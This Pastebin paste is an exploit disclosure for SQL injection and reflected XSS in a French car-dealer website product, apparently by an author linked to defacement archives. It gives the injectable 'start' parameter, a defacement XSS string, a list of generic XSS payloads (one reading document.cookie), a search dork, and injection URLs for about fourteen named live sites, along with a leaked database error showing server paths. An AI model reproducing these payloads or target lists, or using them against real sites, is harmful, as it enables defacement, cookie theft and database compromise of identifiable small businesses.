API tools faq
paste
KingSkrupellos

DGinteractive Internet Automobile XSS SQL Injection

KingSkrupellos
May 20th, 2020
156
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.28 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : DGinteractive Internet Automobile XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21 May 2020
  7. # Vendor Homepage : dginteractive.fr
  8. + dginteractive.fr/creation-de-sites-internet/creation-site-internet-mandataire-automobile-concession-garage
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Exploit Risk : Medium
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-79 [ Improper Neutralization of Input During Web Page
  15. Generation ('Cross-site Scripting') ]
  16. CAPEC-66 [ SQL Injection ]
  17. CAPEC-63 [ Cross-Site Scripting (XSS) ]
  18. # Google Dorks : DGinteractive : création de site internet automobile
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  22. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  23. zone-h.org/archive/notifier=CyBeRiZM
  24. # Mirror-H : mirror-h.org/search/hacker/948/
  25. mirror-h.org/search/hacker/94/
  26. mirror-h.org/search/hacker/1826/
  27. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  28. defacer.id/archive/team/Cyberizm-Org
  29. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  30. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  31. aljyyosh.org/hacker.php?id=Cyberizm.Org
  32. aljyyosh.org/hacker.php?id=Cyberizm
  33. # Zone-D : zone-d.org/attacker/id/69
  34. # Pastebin : pastebin.com/u/KingSkrupellos
  35. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  36.  
  37. ###################################################################
  38.  
  39. # Impact :
  40. ***********
  41. DGinteractive is prone to an SQL-injection vulnerability because it fails to sufficiently
  42. sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
  43. an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
  44. in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
  45. application and execute arbitrary SQL commands in application`s database.
  46. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  47. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  48.  
  49. Reflected XSS (or Non-Persistent) :
  50. ***************************************
  51. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  52. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  53. to a vulnerable web application, which is then reflected back to the victim and executed by the
  54. web browser. The most common mechanism for delivering malicious content is to include
  55. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
  56. URLs constructed in this manner constitute the core of many phishing schemes, whereby
  57. an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
  58. the attacker's content back to the victim,the content is executed by the victim's browser.
  59.  
  60. CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
  61. ***********************************************************************************
  62. The software constructs all or part of an SQL command using externally-influenced input from an
  63. upstream component, but it does not neutralize or incorrectly neutralizes special elements that could
  64. modify the intended SQL command when it is sent to a downstream component.
  65.  
  66. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  67. ********************************************************************************
  68. The software does not neutralize or incorrectly neutralizes user-controllable input before
  69. it is placed in output that is used as a web page that is served to other users.
  70.  
  71. Cross-site scripting (XSS) vulnerabilities occur when:
  72.  
  73. 1. Untrusted data enters a web application, typically from a web request.
  74.  
  75. 2. The web application dynamically generates a web page that contains this untrusted data.
  76.  
  77. 3. During page generation, the application does not prevent the data from containing content
  78. that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes,
  79. mouse events, Flash, ActiveX, etc.
  80.  
  81. 4. A victim visits the generated web page through a web browser, which contains
  82. malicious script that was injected using the untrusted data.
  83.  
  84. 5. Since the script comes from a web page that was sent by the web server, the victim's
  85. web browser executes the malicious script in the context of the web server's domain.
  86.  
  87. 6. This effectively violates the intention of the web browser's same-origin policy, which states
  88. that scripts in one domain should not be able to access resources or run code in a different domain.
  89.  
  90. CAPEC-66: SQL Injection
  91. ************************
  92. This attack exploits target software that constructs SQL statements based on user input.
  93. An attacker crafts input strings so that when the target software constructs SQL statements
  94. based on the input, the resulting SQL statement performs actions other than those the application intended.
  95. SQL Injection results from failure of the application to appropriately validate input.
  96. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation
  97. as part of SQL queries, it is possible to glean information from the database in ways not envisaged
  98. during application design. Depending upon the database and the design of the application,
  99. it may also be possible to leverage injection to have the database execute system-related commands
  100. of the attackers' choice. SQL Injection enables an attacker to talk directly to the database,
  101. thus bypassing the application completely. Successful injection can cause information disclosure
  102. as well as ability to add or modify data in the database.
  103.  
  104. CAPEC-63: Cross-Site Scripting (XSS)
  105. ************************************
  106. An adversary embeds malicious scripts in content that will be served to web browsers.
  107. The goal of the attack is for the target software, the client-side browser, to execute the script
  108. with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are
  109. brought on by allowing remote hosts to execute code and scripts. Web browsers, for example,
  110. have some simple security controls in place, but if a remote attacker is allowed to execute
  111. scripts (through injecting them in to user-generated content like bulletin boards) then these
  112. controls may be bypassed. Further, these attacks are very difficult for an end user to detect.
  113.  
  114. ###################################################################
  115.  
  116. # SQL Vulnerable Parameter :
  117. **************************
  118. ?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]
  119.  
  120. # SQL Injection Exploit :
  121. **********************
  122. /index.php?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]
  123.  
  124. # Cross Site Scripting XSS Exploit :
  125. ********************************
  126. /index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0
  127. &formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27%3Cmarquee
  128. %3E%3Cfont%20color=lime%20size=32%3EHacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E
  129.  
  130. 1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>
  131.  
  132. "><script>alert(String.fromCharCode(88,83,83))</script>
  133.  
  134. ">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1
  135.  
  136. <ScRipT>alert("XSS");</ScRipT>
  137.  
  138. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  139.  
  140. “><ScRiPt>alert(document.cookie)</script>
  141.  
  142. data:text/html,<script>alert(0)</script>
  143.  
  144. <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
  145.  
  146. ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
  147.  
  148. <svg onload=alert(1)//
  149.  
  150. <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
  151.  
  152. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  153.  
  154. ###################################################################
  155.  
  156. # Example Vulnerable Sites and Vulnerable IP Addresses :
  157. ***************************************************
  158. Reverse IP results for (213.186.33.2)
  159. There are 60,082 domains hosted on this server.
  160.  
  161. Reverse IP results for (164.132.235.17)
  162. There are 89,323 domains hosted on this server.
  163.  
  164. Reverse IP results for (213.186.33.19)
  165. There are 145,637 domains hosted on this server.
  166.  
  167. Reverse IP results for (87.98.154.146)
  168. There are 84,065 domains hosted on this server.
  169.  
  170. Reverse IP results for (213.186.33.107)
  171. There are 1,380 domains hosted on this server.
  172.  
  173. Reverse IP results for (213.186.33.16)
  174. There are 66,886 domains hosted on this server.
  175.  
  176. Reverse IP results for (217.160.0.58)
  177. There are 14,732 domains hosted on this server.
  178.  
  179. Reverse IP results for (213.186.33.4)
  180. There are 114,183 domains hosted on this server.
  181.  
  182. Reverse IP results for (164.132.235.17)
  183. There are 89,323 domains hosted on this server.
  184.  
  185. Reverse IP results for (217.160.0.116)
  186. There are 14,867 domains hosted on this server.
  187.  
  188. Reverse IP results for (213.186.33.40)
  189. There are 95,065 domains hosted on this server.
  190.  
  191. Reverse IP results for (213.186.33.3)
  192. There are 103,623 domains hosted on this server.
  193.  
  194. Reverse IP results for (81.88.48.95)
  195. There are 11,443 domains hosted on this server.
  196.  
  197. Reverse IP results for (213.186.33.16)
  198. There are 66,886 domains hosted on this server.
  199.  
  200. [+] milleniumauto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  201.  
  202. [+] ie-auto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  203.  
  204. [+] adourimport.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  205.  
  206. [+] autoimportjls.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  207.  
  208. [+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  209.  
  210. [+] lmda-automobiles.fr//index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  211.  
  212. [+] auto-direct-import.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  213.  
  214. [+] neuve-occaz-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  215.  
  216. [+] milleniumautogalerie.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  217.  
  218. [+] garagefillon.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  219.  
  220. [+] autoimport72.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  221.  
  222. [+] priscar.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  223.  
  224. [+] camping-saint-meen.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  225.  
  226. [+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27
  227.  
  228. ###################################################################
  229.  
  230. # Example SQL Database Error :
  231. ****************************
  232. Erreur recup liste produit You have an error in your SQL syntax; check the manual that corresponds
  233. to your MySQL server version for the right syntax to use near '',16' at line 1 :: SELECT * FROM
  234. dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre ASC LIMIT 1',16
  235. Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or
  236. access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds
  237. to your MySQL server version for the right syntax to use near '',16' at line 1' in /home/cuisiniezb
  238. /www/inc.resultat.php:11 Stack trace: #0 /home/cuisiniezb/www/inc.resultat.php(11): PDO->
  239. query('SELECT * FROM d...') #1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...')
  240. #2 {main} thrown in /home/cuisiniezb/www/inc.resultat.php on line 11
  241.  
  242. ###################################################################
  243.  
  244. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  245.  
  246. ###################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!